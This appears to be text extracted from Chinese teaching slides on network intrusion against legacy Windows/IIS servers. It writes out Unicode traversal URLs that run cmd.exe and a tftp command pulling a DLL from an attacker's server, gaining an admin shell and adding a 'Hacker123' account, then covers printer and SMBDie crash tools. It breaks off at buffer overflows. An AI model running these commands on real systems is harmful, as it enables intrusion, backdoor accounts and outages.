第五部分网络入侵教学课件知识分享.pptVIP

利用Unicode漏洞删除主页 拷贝文件 为了是使用方便，利用语句将cmd.exe文件拷贝到scripts目录，并改名为c.exe，使用的语句是： 09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+c.exe 程序执行结果如图5-24所示。 查看C盘的目录 以后使用cmd.exe命令就方便了，比如查看C盘的目录，使用的语句就可以简化为： 09/scripts/c.exe?/c+dir+c:\ 执行的结果如图5-25所示。 利用Unicode漏洞入侵系统 在地址栏上执行命令，用户的权限比较低，像net等系统管理指令不能执行。利用Unicode可以入侵对方的系统，并得到管理员权限。首先需要向对方服务器上传一些文件，入侵的第一步，建立tftp服务器，向对方的scripts文件夹传几个文件。 需要上传一个名为“idq.dll”的文件，为了上传这个文件，首先在本地计算机上搭建一个TFTP服务器，普通文件传输协议TFTP（Text File Transmission Protocol）一般用来传输单个文件。使用工具软件tftpd32.exe建立服务器。将idq.dll和tftpd32.exe放在本地的同一目录下，执行tftpd32.exe程序，主界面如图5-26所示。 利用Unicode漏洞入侵系统 利用Unicode漏洞入侵系统 这样在本地的TFTP的服务器就建立好了，保留这个窗口，通过该服务器向对方传递idq.dll文件。在浏览器中执行命令： “09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp+-i+10+get+idq.dll”， 命令其实是“tftp –i 10 get idq.dll”意思是从10服务器上获取idq.dll文件，执行成功的界面如图5-27所示。 上载文件 查看scripts目录 上传完毕后可以查看一下scripts目录，是否真的上传成功了。如图5-28所示。 入侵对方主机 说明已经成功的在scripts目录中上传了一个idq.dll文件，下面使用工具软件ispc.exe入侵对方系统。 拷贝ispc.exe文件到本地计算机的C盘根目录，在DOS命令行下执行命令： “ispc.exe 09/scripts/idq.dll”，连接成功后就直接进入了对方的DOS命令行下，而且具有管理员权限，入侵的过程5-29所示。 建立用户 可以在对方计算机上做管理员可以做的一切事情，比如添加用户，建立一个用户名为“Hacker123”，密码也是“Hacker123”的用户，如图5-30所示。 其他漏洞攻击 利用打印漏洞 利用打印漏洞可以在目标的计算机上添加一个具有管理员权限的用户。经过测试，该漏洞在SP2、SP3以及SP4版本上依然存在，但是不能保证100%入侵成功。 使用工具软件：cniis.exe，使用的语法格式是：“cniis 09 0”，第一个参数是目标的IP地址，第二参数是目标操作系统的补丁号，因为09没有打补丁，这里就是0。拷贝cniis.exe文件到C盘根目录，执行程序如图5-31所示。 SMB致命攻击 SMB（Session Message Block，会话消息块协议）又叫做NetBIOS或LanManager协议，用于不同计算机之间文件、打印机、串口和通讯的共享和用于Windows平台上提供磁盘和打印机的共享。 SMB协议版本有很多种，在Windows 98、Windows NT、Windows 2000和XP使用的是NTLM 0.12版本。 利用该协议可以进行各方面的攻击，比如可以抓取其他用户访问自己计算机共享目录的SMB会话包，然后利用SMB会话包登录对方的计算机。下面介绍利用SMB协议让对方操作系统系统重新启动或者蓝屏。 致命攻击 使用的工具软件是：SMBDie V1.0，该软件对打了SP3、SP4的计算机依然有效，必须打专门的SMB补丁，软件的主界面如图5-32所示。 致命攻击 攻击的时候，需要两个参数：对方的IP地址和对方的机器名，窗口中分别输入这两项，如图5-33所示。 致命攻击 然后再点按钮“Kill”，如果参数输入没有错误的话，对方计算机立刻重启或蓝屏，命中率几乎100%，被攻击的计算机蓝屏界面如图5-34所示。 缓冲区溢出攻击 目前最流行的一种攻击技术就是缓冲区溢出攻击。当目标操作系统收到了超过了它的最大能接收的信息量的时候，将发生缓冲区溢出。这些多余的数据将使程序的缓冲区溢出，然后覆盖了实际的程序数据，缓冲区溢出使目标系统的程序被修改，经过这种修改的结果使在系统上产生一个后门。 这项攻击对技术要